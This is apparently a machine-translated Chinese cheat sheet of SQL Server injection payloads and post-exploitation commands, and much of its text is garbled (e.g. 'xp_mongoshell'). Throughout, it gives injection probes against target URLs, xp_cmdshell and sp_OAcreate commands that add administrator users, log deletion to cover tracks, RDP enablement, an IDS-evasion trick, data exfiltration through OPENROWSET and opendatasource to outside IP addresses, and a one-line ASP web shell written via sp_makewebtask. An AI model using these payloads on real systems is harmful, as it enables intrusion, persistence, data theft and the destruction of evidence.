And exists (select * from sysobjects) // you can check whether it is MSSQL.
And exists (select * from tableName) // determines whether a table exists. tableName indicates the table name.
And 1 = (select @ VERSION) // MSSQL VERSION
And 1 = (select db_name () // Current Database Name
And 1 = (select @ servername) // local service name
And 1 = (select IS_SRVROLEMEMBER ('sysadmin') // determine whether the system administrator is
And 1 = (Select IS_MEMBER ('db _ owner') // determine whether the database permission is used
And 1 = (Select HAS_DBACCESS ('master') // checks whether the database has read permission.
And 1 = (select name from master. dbo. sysdatabases where dbid = 1) // storm database name DBID is 1, 2, 3 ....
; Declare @ d int // whether multiple rows are supported
And 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = 'X' AND name = 'xp _ existing shell') // determine whether xp_existing shell exists
And 1 = (select count (*) FROM master. dbo. sysobjects where name = 'xp _ regread ') // check whether the XP_regread extended stored procedure has been deleted
User test who adds and deletes a SA permission: (the SA permission is required)
Exec master. dbo. sp_addlogin test, password
Exec master. dbo. sp_addsrvrolemember test, sysadmin
Stop or activate a service. (SA permission required)
Exec master.. xp_servicecontrol 'stop', 'schedule'
Exec master.. xp_servicecontrol 'start', 'schedule'
Violent website directory
Create table labeng (lala nvarchar (255), id int)
DECLARE @ result varchar (255) EXEC master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System \ ControlSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots', '/', @ result output insert into labeng (lala) values (@ result );
And 1 = (select top 1 lala from labeng) or and 1 = (select count (*) from labeng where lala> 1)
-----------------------------------------------------
Open 3389 under DOS and modify the port number
SC config termservice start = auto
Net start termservice
// Allow external connections
Reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"/v fDenyTSConnections/t REG_DWORD/d 0x0/f
// Port 3389 to port 80
Reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp"/v PortNumber/t REG_DWORD/d 80/f
SQL Server
Determine whether injection is allowed:
Http://www.targer.com/article.asp? Id = 6
Http://www.targer.com/article.asp? Id = 6'
Http://www.targer.com/article.asp? Id = 6 and 1 = 1
Http://www.targer.com/article.asp? Id = 6 and 1 = 2
Http://www.targer.com/article.asp? Action = value' and 1 = 1
Http://www.targer.com/article.asp? Action = value' and 1 = 2
Searchpoints % 'and 1 = 1
Searchpoints % 'and 1 = 2
Determine the database type:
Http://www.targer.com/article.asp? Id = 6 and user> 0
Http://www.targer.com/article.asp? Id = 6 and (select count (*) from sysobjects)> 0
Query the current user data:
Article. asp? Id = 6 having 1 = 1 --
Columns in the current table:
Article. asp? Id = 6 group by admin. username having 1 = 1 --
Article. asp? Id = 6 group by admin. username, admin. password having 1 = 1 --
Arbitrary tables and columns:
And (select top 1 name from (select top N id, name from sysobjects where xtype = char (85) T order by id desc)> 1
And (select top col_name (object_id ('admin'), N) from sysobjects)> 1
Violent database data:
And (select top 1 password from admin where id = N)> 1
Modify data in the database:
; Update admin set password = 'oooooooo 'where username = 'xxx'
Add data in the database:
; Insert into admin values (xxx, Oooooooo )--
Delete database:
; Drop database webdata
Get the current database username: and user> 0
Get the current database name: and db_name ()> 0
Obtain the database version: and (select @ version)> 0
Determine whether multi-sentence queries are supported:; declare @ a int --
Determine whether subqueries are supported: and (select count (1) from [sysobjects])> = 0
Extended database Stored Procedure: exec master .. xp_mongoshell
View the directory of server c:; exec_master .. xp_mongoshell 'dir c :\'
Determine whether the extended stored procedure exists: and select count (*) from master. dbo. sysobjects where xtype = 'X' and name = 'xp _ shortshell'
Restore extended stored procedure:; exec sp_addextendedproc xp_mongoshell, 'xp log70. dll'
Delete the extended stored procedure:; exec sp_dropextendedproc 'xp _ export shell'
MSSQL2000 provides some functions for indirectly obtaining permissions to access OLE objects:
; Declare @ s int
; Exec sp_oacreat 'wscript. shell', @ s
; Exec master .. spoamethod @s,'run', null,'cmd.exe/c dir c :\'
Determine whether the current database user name has high permissions:
And 1 = (select is_srvrolemember ('sysadmin '))
And 1 = (select is_srvrolemember ('serveradmin '))
And 1 = (select is_srvrolemember ('setupadmin '))
And 1 = (select is_srvrolemember ('securityadmin '))
And 1 = (select is_srvrolemember ('diskadmin '))
And 1 = (select is_srvrolemember ('bulkadmin '))
Determine whether the current database user name is DB_OWNER:
And 1 = (select is_member ('db _ owner '))
All database information in the SQLSERVER database system is stored in the master. dbo. sysdatabases table of SQLSERVER. You only need the PUBLIC permission to SELECT the table:
And (select top 1 name from master. dbo. sysdatabase order by dbid)> 0
And (select top 1 name from master. dbo. sysdatabase where name not in (select top 1 name from master. dbo. sysdatabases order by dbid)> 0
Delete log records:
; Exec master. dbo. xp_cmdshell 'del c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070606.log> c: \ temp.txt'
Replace log records:
Exec master. dbo. xp_mongoshell 'Copy c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070404.log c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070606.log> c: \ temp.txt'
Obtain the WEB path:
; Declare @ shell int
; Exec master .. sp_oamethod 'wscript. shell', @ shell out
; Exec master .. sp_oamethod @shell,'run', null,'cmd.exe/c dir/s d:/index. asp> c:/log.txt
Search by XP_CMDSHELL:
; Exec master .. xp_mongoshell 'dir/s d:/index. asp'
Command for displaying server website configuration information:
Cmd/c cscript.exe c: \ inetpub \ adminscript \ adsutil. vbs enum w3svc/1/root
Cmd/c cscript.exe c: \ inetpub \ adminscript \ adsutil. vbs enum w3svc/2/root
Use XP_REGREAD to read data with PUBLIC permissions:
; Exec master. dbo. xp_regread
Hkey_local_machine,
'System \ currentcontrolset \ services \ w3svc \ parameters \ virtual roots \'
'/'
For more information about the advanced technologies of SQLSERVER, see chapter 5 of proficient script hacker by Zeng yunhao.
3. DSqlHelper
Check permission SYSADMIN:
And 1 = (select IS_SRVROLEMEMBER ('sysadmin '))
Serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, and db_owner.
Check XP_CMDSHELL (CMD command ):
And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'xp _ mongoshell ')
Check XP_REGREAD (Registry READ function ):
And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'xp _ regread ')
Check SP_MAKEWEBTASK (backup function ):
And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'SP _ makewebtask ')
Test SP_ADDEXTENDEDPROC:
And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'SP _ addextendedproc ')
Check the XP_SUBDIRS read subdirectory:
And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'xp _ subdirs ')
Check the XP_DIRTREE read subdirectory:
And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'xp _ dirtree ')
Modification content:
; UPDATE table name set field = content where 1 = 1
Xp_mongoshell Detection:
; Exec master .. xp_mongoshell 'dir c :\'
Fix XP_CMDSHELL:
; Exec master. dbo. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll'
Use XP_CMDSHELL to add a user hacker:
; Exec master. dbo. xp_mongoshell 'net user hacker 123456/add'
Xp_mongoshell adds the user hacker to the ADMIN group:
; Exec master. dbo. xp_mongoshell 'net localgroup administrators hacker/add'
Create Table test:
; Create table [dbo]. [test] ([dstr] [char] (255 ));
Test:
And exists (select * from test)
Location for reading the WEB (read the Registry ):
; DECLARE @ result varchar (255) EXEC master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System \ ControlSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots', '/', @ result output insert into test (dstr) values (@ result );--
The absolute path of the WEB is exposed (the explicit error mode ):
And 1 = (select count (*) from test where dstr> 1)
Delete table test:
; Drop table test ;--
Create a table dirs to view the directory:
; Create table dirs (paths varchar (100), id int)
Add the contents of the viewed directory to the dirs table:
; Insert dirs exec master. dbo. xp_dirtree 'C :\'
Burst directory content dirs:
And 0 <> (select top 1 paths from dirs)
Backup database DATANAME:
Declare @ a sysname; set @ a = db_name (); backup DATANAME @ a to disk = 'C: \ inetpub \ wwwroot \ down. bak ';--
Delete table dirs:
; Drop table dirs ;--
Create Table temp:
; Create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
Add the drive disk list to the temp table:
; Insert temp exec master. dbo. xp_availablemedia ;--
Delete table temp:
; Delete from temp ;--
Create Table dirs:
; Create table dirs (paths varchar (100), id int );--
Obtain the subdirectory list XP_SUBDIRS:
; Insert dirs exec master. dbo. xp_subdirs 'C :\';--
Burst content (explicit error mode ):
And 0 <> (select top 1 paths from dirs)
Delete table dirs:
; Delete from dirs ;--
Create Table dirs:
; Create table dirs (paths varchar (100), id int )--
Use XP_CMDSHELL to view the directory content:
; Insert dirs exec master .. xp_mongoshell 'dir c :\'
Delete table dirs:
; Delete from dirs ;--
Check SP_OAcreate (Execute Command ):
And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'SP _ OAcreate ')
SP_OAcreate:
; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C net user hacker 123456/add'
SP_OAcreate directory:
; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C md E: \ XkCmsV \ webForm \ 1111'
Create a virtual directory edisk:
; Declare @ o int exec sp_oacreate 'wscript. shell ', @ o out exec sp_oamethod @ o, 'run', NULL, 'cscript.exe c: \ inetpub \ wwwroot \ mkwebdir. vbs-w "Default Web site"-v "e", "e :\"'
Set virtual directory E to readable:
; Declare @ o int exec sp_oacreate 'wscript. shell ', @ o out exec sp_oamethod @ o, 'run', NULL, 'cscript.exe c: \ inetpub \ wwwroot \ chaccess. vbs-a w3svc/1/ROOT/e + browse'
Start the SERVER Service:
; Exec master .. xp_servicecontrol 'start', 'server'
Attackers can bypass IDS detection xp_javasshell:
; Declare @ a sysname set @ a = 'xp _ '+ 'your shell' exec @ a' dir c :\'
Enable remote database 1:
; Select * from OPENROWSET ('sqloledb', 'server = servername; uid = sa; pwd = apachy_123 ', 'select * from table1 ')
Enable remote database 2:
; Select * from OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1, 1433; ', 'select * from table'
// Check the permissions.
And 1 = (Select IS_MEMBER ('db _ owner '))
And char (124) % 2 BCast (IS_MEMBER ('db _ owner') as varchar (1) % 2 Bchar (124) = 1 ;--
// Check whether you have the permission to read a database
And 1 = (Select HAS_DBACCESS ('master '))
And char (124) % 2 BCast (HAS_DBACCESS ('master') as varchar (1) % 2 Bchar (124) = 1 --
Numeric type
And char (124) % 2 Buser % 2 Bchar (124) = 0
Character Type
'And char (124) % 2 Buser % 2 Bchar (124) = 0 and ''='
Search type
'And char (124) % 2 Buser % 2 Bchar (124) = 0 and' % '='
Brute-force Username
And user> 0
'And user> 0 and ''='
Check whether the permission is SA
And 1 = (select IS_SRVROLEMEMBER ('sysadmin '));--
And char (124) % 2 BCast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1) % 2 Bchar (124) = 1 --
Check whether MSSQL database is used
And exists (select * from sysobjects );--
Check whether multiple rows are supported
; Declare @ d int ;--
Restore xp_mongoshell
; Exec master .. dbo. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll ';--
Select * from openrowset ('sqloledb', 'server = 192.168.1.200, 1433; uid = test; pwd = pafsp', 'select @ version ')
//-----------------------
// Execute the command
//-----------------------
First, enable the sandbox mode:
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1
Then run the system command using jet. oledb.
Select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c: \ winnt \ system32 \ ias. mdb ', 'select shell ("cmd.exe/c net user admin admin1234/add ")')
Execute Command
; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ WINNT \ system32 \ cmd.exe/C net user paf pafpaf/add ';--
EXEC [master]. [dbo]. [xp_mongoshell] 'COMMAND/c md c: \ 8080'
Determine whether the xp_mongoshell extended storage process exists:
Http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = 'X' AND name = 'xp _ Your shell ')
Write registry
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1
REG_SZ
Read Registry
Exec master.. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon', 'userinit'
Read directory content
Exec master .. xp_dirtree 'C: \ winnt \ system32 \ ', 1, 1
Database Backup
Backup database pubs to disk = 'C: \ 123. Bak'
// Burst length
And (Select char (124) % 2 BCast (Count (1) as varchar (8000) % 2 Bchar (124) From D99_Tmp) = 0 ;--
To change the sa password, run the following command:
Exec sp_password NULL, 'new password', 'sa'
Test:
Exec master. dbo. sp_addlogin test, ptlove
Exec master. dbo. sp_addsrvrolemember test, sysadmin
Delete the xp_mongoshell statement in the extended stored procedure:
Exec sp_dropextendedproc 'xp _ export shell'
Added extended storage process
EXEC [master] .. sp_addextendedproc 'xp _ proxiedadata', 'c: \ winnt \ system32 \ sqllog. dll'
GRANT exec On xp_proxiedadata TO public
Stop or activate a service.
Exec master.. xp_servicecontrol 'stop', 'schedule'
Exec master.. xp_servicecontrol 'start', 'schedule'
Dbo. xp_subdirs
Only list subdirectories in a directory.
Xp_getfiledetails 'C: \ Inetpub \ wwwroot \ SQLInject \ login. asp'
Dbo. xp_makecab
Compress multiple target files to a specific target file.
All files to be compressed can be connected to the end of the parameter column and separated by commas.
Dbo. xp_makecab
'C: \ test. cab', 'mszip ', 1,
'C: \ Inetpub \ wwwroot \ SQLInject \ login. asp ',
'C: \ Inetpub \ wwwroot \ SQLInject \ securelogin. asp'
Xp_terminate_process
Stop a program in execution, but assign the Process ID parameter.
Select "View"-"select field" in the "Work administrator" menu to view the Process ID of each execution program.
Xp_terminate_process 2484
Xp_unpackcab
Uncompress the file.
Xp_unpackcab 'C: \ test. cab', 'c: \ temp ', 1
A computer installed with radmin, the password was modified, and regedit.exewas not found to be deleted or changed, and net.exe did not exist. There is no way to use regedit/e to import the registration file, but mssql is the sa permission. Execute the master using the following command. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'parameter ', 'reg _ BINARY', 0x02ba5e187e2589be6f80da0046aa7e3c, you can change the password to 12345678. If you want to modify the port value EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'Port', 'reg _ BINARY ', and 0xd20400 change port value to 1234
Create database lcx;
Create TABLE ku (name nvarchar (256) null );
Create TABLE biao (id int NULL, name nvarchar (256) null );
// Obtain the Database Name
Insert into opendatasource ('sqloledb', 'server = 211.39.145.163, 1443; uid = test; pwd = pafpaf; database = lcx '). lcx. dbo. ku select name from master. dbo. sysdatabases
// Create a table in the Master to check the Permissions
Create TABLE master .. D_TEST (id nvarchar (4000) NULL, Data nvarchar (4000) NULL );--
Use sp_makewebtask to directly write a sentence in the web directory:
Http: // 127.0.0.1/dblogin123.asp? Username = 123 '; exec % 20sp_makewebtask % 20 'd: \ www \ tt \ 88. asp ',' % 20 select % 20 ''<% 25 execute (request (" a ") % 25>'' % 20 ';--
// Update table content
Update films SET kind = 'dramatic 'Where id = 123
// Delete content
Delete from table_name where Stockid = 3